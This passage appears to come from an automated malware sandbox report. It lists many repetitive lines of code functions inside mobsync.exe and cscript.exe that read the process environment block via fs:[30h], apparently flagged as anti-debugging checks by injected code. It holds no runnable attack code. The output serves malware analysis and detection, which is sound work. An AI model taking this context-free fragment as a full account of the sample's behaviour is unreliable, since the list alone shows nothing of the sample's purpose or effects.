Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A7FAB0 mov eax, dword ptr fs:[00000030h]	5_2_04A7FAB0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A7D294 mov eax, dword ptr fs:[00000030h]	5_2_04A7D294
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A7D294 mov eax, dword ptr fs:[00000030h]	5_2_04A7D294
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A72AE4 mov eax, dword ptr fs:[00000030h]	5_2_04A72AE4
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A72ACB mov eax, dword ptr fs:[00000030h]	5_2_04A72ACB
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A84A2C mov eax, dword ptr fs:[00000030h]	5_2_04A84A2C
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A84A2C mov eax, dword ptr fs:[00000030h]	5_2_04A84A2C
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6A229 mov eax, dword ptr fs:[00000030h]	5_2_04A6A229
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6A229 mov eax, dword ptr fs:[00000030h]	5_2_04A6A229
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6A229 mov eax, dword ptr fs:[00000030h]	5_2_04A6A229
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6A229 mov eax, dword ptr fs:[00000030h]	5_2_04A6A229
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6A229 mov eax, dword ptr fs:[00000030h]	5_2_04A6A229
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6A229 mov eax, dword ptr fs:[00000030h]	5_2_04A6A229
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6A229 mov eax, dword ptr fs:[00000030h]	5_2_04A6A229
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6A229 mov eax, dword ptr fs:[00000030h]	5_2_04A6A229
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6A229 mov eax, dword ptr fs:[00000030h]	5_2_04A6A229
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B0AA16 mov eax, dword ptr fs:[00000030h]	5_2_04B0AA16
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B0AA16 mov eax, dword ptr fs:[00000030h]	5_2_04B0AA16
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A58A0A mov eax, dword ptr fs:[00000030h]	5_2_04A58A0A
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A4AA16 mov eax, dword ptr fs:[00000030h]	5_2_04A4AA16
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A4AA16 mov eax, dword ptr fs:[00000030h]	5_2_04A4AA16
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A45210 mov eax, dword ptr fs:[00000030h]	5_2_04A45210
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A45210 mov ecx, dword ptr fs:[00000030h]	5_2_04A45210
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A45210 mov eax, dword ptr fs:[00000030h]	5_2_04A45210
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A45210 mov eax, dword ptr fs:[00000030h]	5_2_04A45210
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A63A1C mov eax, dword ptr fs:[00000030h]	5_2_04A63A1C
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AFB260 mov eax, dword ptr fs:[00000030h]	5_2_04AFB260
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AFB260 mov eax, dword ptr fs:[00000030h]	5_2_04AFB260
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A8927A mov eax, dword ptr fs:[00000030h]	5_2_04A8927A
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B18A62 mov eax, dword ptr fs:[00000030h]	5_2_04B18A62
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A49240 mov eax, dword ptr fs:[00000030h]	5_2_04A49240
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A49240 mov eax, dword ptr fs:[00000030h]	5_2_04A49240
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A49240 mov eax, dword ptr fs:[00000030h]	5_2_04A49240
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A49240 mov eax, dword ptr fs:[00000030h]	5_2_04A49240
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B0EA55 mov eax, dword ptr fs:[00000030h]	5_2_04B0EA55
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AD4257 mov eax, dword ptr fs:[00000030h]	5_2_04AD4257
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A74BAD mov eax, dword ptr fs:[00000030h]	5_2_04A74BAD
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A74BAD mov eax, dword ptr fs:[00000030h]	5_2_04A74BAD
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A74BAD mov eax, dword ptr fs:[00000030h]	5_2_04A74BAD
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B15BA5 mov eax, dword ptr fs:[00000030h]	5_2_04B15BA5
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A51B8F mov eax, dword ptr fs:[00000030h]	5_2_04A51B8F
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A51B8F mov eax, dword ptr fs:[00000030h]	5_2_04A51B8F
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AFD380 mov ecx, dword ptr fs:[00000030h]	5_2_04AFD380
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A72397 mov eax, dword ptr fs:[00000030h]	5_2_04A72397
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A7B390 mov eax, dword ptr fs:[00000030h]	5_2_04A7B390
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B0138A mov eax, dword ptr fs:[00000030h]	5_2_04B0138A
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A703E2 mov eax, dword ptr fs:[00000030h]	5_2_04A703E2
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A703E2 mov eax, dword ptr fs:[00000030h]	5_2_04A703E2
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A703E2 mov eax, dword ptr fs:[00000030h]	5_2_04A703E2
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A703E2 mov eax, dword ptr fs:[00000030h]	5_2_04A703E2
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A703E2 mov eax, dword ptr fs:[00000030h]	5_2_04A703E2
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A703E2 mov eax, dword ptr fs:[00000030h]	5_2_04A703E2
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A6DBE9 mov eax, dword ptr fs:[00000030h]	5_2_04A6DBE9
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AC53CA mov eax, dword ptr fs:[00000030h]	5_2_04AC53CA
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04AC53CA mov eax, dword ptr fs:[00000030h]	5_2_04AC53CA
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B0131B mov eax, dword ptr fs:[00000030h]	5_2_04B0131B
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A4DB60 mov ecx, dword ptr fs:[00000030h]	5_2_04A4DB60
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A73B7A mov eax, dword ptr fs:[00000030h]	5_2_04A73B7A
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A73B7A mov eax, dword ptr fs:[00000030h]	5_2_04A73B7A
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A4DB40 mov eax, dword ptr fs:[00000030h]	5_2_04A4DB40
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04B18B58 mov eax, dword ptr fs:[00000030h]	5_2_04B18B58
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04A4F358 mov eax, dword ptr fs:[00000030h]	5_2_04A4F358
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0483849B mov eax, dword ptr fs:[00000030h]	12_2_0483849B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E4496 mov eax, dword ptr fs:[00000030h]	12_2_048E4496
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E4496 mov eax, dword ptr fs:[00000030h]	12_2_048E4496
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E4496 mov eax, dword ptr fs:[00000030h]	12_2_048E4496
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E4496 mov eax, dword ptr fs:[00000030h]	12_2_048E4496
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E4496 mov eax, dword ptr fs:[00000030h]	12_2_048E4496
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E4496 mov eax, dword ptr fs:[00000030h]	12_2_048E4496
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E4496 mov eax, dword ptr fs:[00000030h]	12_2_048E4496
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E4496 mov eax, dword ptr fs:[00000030h]	12_2_048E4496
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E4496 mov eax, dword ptr fs:[00000030h]	12_2_048E4496
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E4496 mov eax, dword ptr fs:[00000030h]	12_2_048E4496
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E4496 mov eax, dword ptr fs:[00000030h]	12_2_048E4496
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E4496 mov eax, dword ptr fs:[00000030h]	12_2_048E4496
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E4496 mov eax, dword ptr fs:[00000030h]	12_2_048E4496
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048F8CD6 mov eax, dword ptr fs:[00000030h]	12_2_048F8CD6
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E14FB mov eax, dword ptr fs:[00000030h]	12_2_048E14FB
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048A6CF0 mov eax, dword ptr fs:[00000030h]	12_2_048A6CF0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048A6CF0 mov eax, dword ptr fs:[00000030h]	12_2_048A6CF0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048A6CF0 mov eax, dword ptr fs:[00000030h]	12_2_048A6CF0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048A6C0A mov eax, dword ptr fs:[00000030h]	12_2_048A6C0A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048A6C0A mov eax, dword ptr fs:[00000030h]	12_2_048A6C0A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048A6C0A mov eax, dword ptr fs:[00000030h]	12_2_048A6C0A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048A6C0A mov eax, dword ptr fs:[00000030h]	12_2_048A6C0A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048F740D mov eax, dword ptr fs:[00000030h]	12_2_048F740D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048F740D mov eax, dword ptr fs:[00000030h]	12_2_048F740D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048F740D mov eax, dword ptr fs:[00000030h]	12_2_048F740D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E1C06 mov eax, dword ptr fs:[00000030h]	12_2_048E1C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E1C06 mov eax, dword ptr fs:[00000030h]	12_2_048E1C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E1C06 mov eax, dword ptr fs:[00000030h]	12_2_048E1C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E1C06 mov eax, dword ptr fs:[00000030h]	12_2_048E1C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E1C06 mov eax, dword ptr fs:[00000030h]	12_2_048E1C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E1C06 mov eax, dword ptr fs:[00000030h]	12_2_048E1C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E1C06 mov eax, dword ptr fs:[00000030h]	12_2_048E1C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E1C06 mov eax, dword ptr fs:[00000030h]	12_2_048E1C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E1C06 mov eax, dword ptr fs:[00000030h]	12_2_048E1C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E1C06 mov eax, dword ptr fs:[00000030h]	12_2_048E1C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E1C06 mov eax, dword ptr fs:[00000030h]	12_2_048E1C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E1C06 mov eax, dword ptr fs:[00000030h]	12_2_048E1C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E1C06 mov eax, dword ptr fs:[00000030h]	12_2_048E1C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E1C06 mov eax, dword ptr fs:[00000030h]	12_2_048E1C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0485BC2C mov eax, dword ptr fs:[00000030h]	12_2_0485BC2C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0485A44B mov eax, dword ptr fs:[00000030h]	12_2_0485A44B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048BC450 mov eax, dword ptr fs:[00000030h]	12_2_048BC450
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048BC450 mov eax, dword ptr fs:[00000030h]	12_2_048BC450
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0484746D mov eax, dword ptr fs:[00000030h]	12_2_0484746D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0485AC7B mov eax, dword ptr fs:[00000030h]	12_2_0485AC7B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0485AC7B mov eax, dword ptr fs:[00000030h]	12_2_0485AC7B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0485AC7B mov eax, dword ptr fs:[00000030h]	12_2_0485AC7B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0485AC7B mov eax, dword ptr fs:[00000030h]	12_2_0485AC7B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0485AC7B mov eax, dword ptr fs:[00000030h]	12_2_0485AC7B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0485AC7B mov eax, dword ptr fs:[00000030h]	12_2_0485AC7B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0485AC7B mov eax, dword ptr fs:[00000030h]	12_2_0485AC7B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0485AC7B mov eax, dword ptr fs:[00000030h]	12_2_0485AC7B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0485AC7B mov eax, dword ptr fs:[00000030h]	12_2_0485AC7B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0485AC7B mov eax, dword ptr fs:[00000030h]	12_2_0485AC7B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0485AC7B mov eax, dword ptr fs:[00000030h]	12_2_0485AC7B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04852581 mov eax, dword ptr fs:[00000030h]	12_2_04852581
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04852581 mov eax, dword ptr fs:[00000030h]	12_2_04852581
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04852581 mov eax, dword ptr fs:[00000030h]	12_2_04852581
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04852581 mov eax, dword ptr fs:[00000030h]	12_2_04852581
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04822D8A mov eax, dword ptr fs:[00000030h]	12_2_04822D8A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04822D8A mov eax, dword ptr fs:[00000030h]	12_2_04822D8A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04822D8A mov eax, dword ptr fs:[00000030h]	12_2_04822D8A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04822D8A mov eax, dword ptr fs:[00000030h]	12_2_04822D8A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04822D8A mov eax, dword ptr fs:[00000030h]	12_2_04822D8A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E2D82 mov eax, dword ptr fs:[00000030h]	12_2_048E2D82
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E2D82 mov eax, dword ptr fs:[00000030h]	12_2_048E2D82
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E2D82 mov eax, dword ptr fs:[00000030h]	12_2_048E2D82
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E2D82 mov eax, dword ptr fs:[00000030h]	12_2_048E2D82
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E2D82 mov eax, dword ptr fs:[00000030h]	12_2_048E2D82
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E2D82 mov eax, dword ptr fs:[00000030h]	12_2_048E2D82
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E2D82 mov eax, dword ptr fs:[00000030h]	12_2_048E2D82
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0485FD9B mov eax, dword ptr fs:[00000030h]	12_2_0485FD9B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0485FD9B mov eax, dword ptr fs:[00000030h]	12_2_0485FD9B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048F05AC mov eax, dword ptr fs:[00000030h]	12_2_048F05AC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048F05AC mov eax, dword ptr fs:[00000030h]	12_2_048F05AC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048535A1 mov eax, dword ptr fs:[00000030h]	12_2_048535A1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04851DB5 mov eax, dword ptr fs:[00000030h]	12_2_04851DB5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04851DB5 mov eax, dword ptr fs:[00000030h]	12_2_04851DB5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04851DB5 mov eax, dword ptr fs:[00000030h]	12_2_04851DB5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048A6DC9 mov eax, dword ptr fs:[00000030h]	12_2_048A6DC9
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048A6DC9 mov eax, dword ptr fs:[00000030h]	12_2_048A6DC9
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048A6DC9 mov eax, dword ptr fs:[00000030h]	12_2_048A6DC9
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048A6DC9 mov ecx, dword ptr fs:[00000030h]	12_2_048A6DC9
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048A6DC9 mov eax, dword ptr fs:[00000030h]	12_2_048A6DC9
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048A6DC9 mov eax, dword ptr fs:[00000030h]	12_2_048A6DC9
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0483D5E0 mov eax, dword ptr fs:[00000030h]	12_2_0483D5E0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0483D5E0 mov eax, dword ptr fs:[00000030h]	12_2_0483D5E0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048EFDE2 mov eax, dword ptr fs:[00000030h]	12_2_048EFDE2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048EFDE2 mov eax, dword ptr fs:[00000030h]	12_2_048EFDE2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048EFDE2 mov eax, dword ptr fs:[00000030h]	12_2_048EFDE2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048EFDE2 mov eax, dword ptr fs:[00000030h]	12_2_048EFDE2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048D8DF1 mov eax, dword ptr fs:[00000030h]	12_2_048D8DF1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0482AD30 mov eax, dword ptr fs:[00000030h]	12_2_0482AD30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04833D34 mov eax, dword ptr fs:[00000030h]	12_2_04833D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04833D34 mov eax, dword ptr fs:[00000030h]	12_2_04833D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04833D34 mov eax, dword ptr fs:[00000030h]	12_2_04833D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04833D34 mov eax, dword ptr fs:[00000030h]	12_2_04833D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04833D34 mov eax, dword ptr fs:[00000030h]	12_2_04833D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04833D34 mov eax, dword ptr fs:[00000030h]	12_2_04833D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04833D34 mov eax, dword ptr fs:[00000030h]	12_2_04833D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04833D34 mov eax, dword ptr fs:[00000030h]	12_2_04833D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04833D34 mov eax, dword ptr fs:[00000030h]	12_2_04833D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04833D34 mov eax, dword ptr fs:[00000030h]	12_2_04833D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04833D34 mov eax, dword ptr fs:[00000030h]	12_2_04833D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04833D34 mov eax, dword ptr fs:[00000030h]	12_2_04833D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04833D34 mov eax, dword ptr fs:[00000030h]	12_2_04833D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048EE539 mov eax, dword ptr fs:[00000030h]	12_2_048EE539
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048F8D34 mov eax, dword ptr fs:[00000030h]	12_2_048F8D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048AA537 mov eax, dword ptr fs:[00000030h]	12_2_048AA537
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04854D3B mov eax, dword ptr fs:[00000030h]	12_2_04854D3B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04854D3B mov eax, dword ptr fs:[00000030h]	12_2_04854D3B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04854D3B mov eax, dword ptr fs:[00000030h]	12_2_04854D3B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04863D43 mov eax, dword ptr fs:[00000030h]	12_2_04863D43
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048A3540 mov eax, dword ptr fs:[00000030h]	12_2_048A3540
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048D3D40 mov eax, dword ptr fs:[00000030h]	12_2_048D3D40
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04847D50 mov eax, dword ptr fs:[00000030h]	12_2_04847D50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0484C577 mov eax, dword ptr fs:[00000030h]	12_2_0484C577
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0484C577 mov eax, dword ptr fs:[00000030h]	12_2_0484C577
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048BFE87 mov eax, dword ptr fs:[00000030h]	12_2_048BFE87
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048F0EA5 mov eax, dword ptr fs:[00000030h]	12_2_048F0EA5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048F0EA5 mov eax, dword ptr fs:[00000030h]	12_2_048F0EA5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048F0EA5 mov eax, dword ptr fs:[00000030h]	12_2_048F0EA5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048A46A7 mov eax, dword ptr fs:[00000030h]	12_2_048A46A7
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04868EC7 mov eax, dword ptr fs:[00000030h]	12_2_04868EC7
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048536CC mov eax, dword ptr fs:[00000030h]	12_2_048536CC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048DFEC0 mov eax, dword ptr fs:[00000030h]	12_2_048DFEC0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048F8ED6 mov eax, dword ptr fs:[00000030h]	12_2_048F8ED6
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048376E2 mov eax, dword ptr fs:[00000030h]	12_2_048376E2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048516E0 mov ecx, dword ptr fs:[00000030h]	12_2_048516E0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0482C600 mov eax, dword ptr fs:[00000030h]	12_2_0482C600
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0482C600 mov eax, dword ptr fs:[00000030h]	12_2_0482C600
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0482C600 mov eax, dword ptr fs:[00000030h]	12_2_0482C600
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04858E00 mov eax, dword ptr fs:[00000030h]	12_2_04858E00
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048E1608 mov eax, dword ptr fs:[00000030h]	12_2_048E1608
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0485A61C mov eax, dword ptr fs:[00000030h]	12_2_0485A61C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0485A61C mov eax, dword ptr fs:[00000030h]	12_2_0485A61C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0482E620 mov eax, dword ptr fs:[00000030h]	12_2_0482E620
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048DFE3F mov eax, dword ptr fs:[00000030h]	12_2_048DFE3F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04837E41 mov eax, dword ptr fs:[00000030h]	12_2_04837E41
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04837E41 mov eax, dword ptr fs:[00000030h]	12_2_04837E41
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04837E41 mov eax, dword ptr fs:[00000030h]	12_2_04837E41
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04837E41 mov eax, dword ptr fs:[00000030h]	12_2_04837E41
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04837E41 mov eax, dword ptr fs:[00000030h]	12_2_04837E41
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04837E41 mov eax, dword ptr fs:[00000030h]	12_2_04837E41
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048EAE44 mov eax, dword ptr fs:[00000030h]	12_2_048EAE44
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048EAE44 mov eax, dword ptr fs:[00000030h]	12_2_048EAE44
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0483766D mov eax, dword ptr fs:[00000030h]	12_2_0483766D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0484AE73 mov eax, dword ptr fs:[00000030h]	12_2_0484AE73
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0484AE73 mov eax, dword ptr fs:[00000030h]	12_2_0484AE73
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0484AE73 mov eax, dword ptr fs:[00000030h]	12_2_0484AE73
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0484AE73 mov eax, dword ptr fs:[00000030h]	12_2_0484AE73
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0484AE73 mov eax, dword ptr fs:[00000030h]	12_2_0484AE73
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04838794 mov eax, dword ptr fs:[00000030h]	12_2_04838794
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048A7794 mov eax, dword ptr fs:[00000030h]	12_2_048A7794
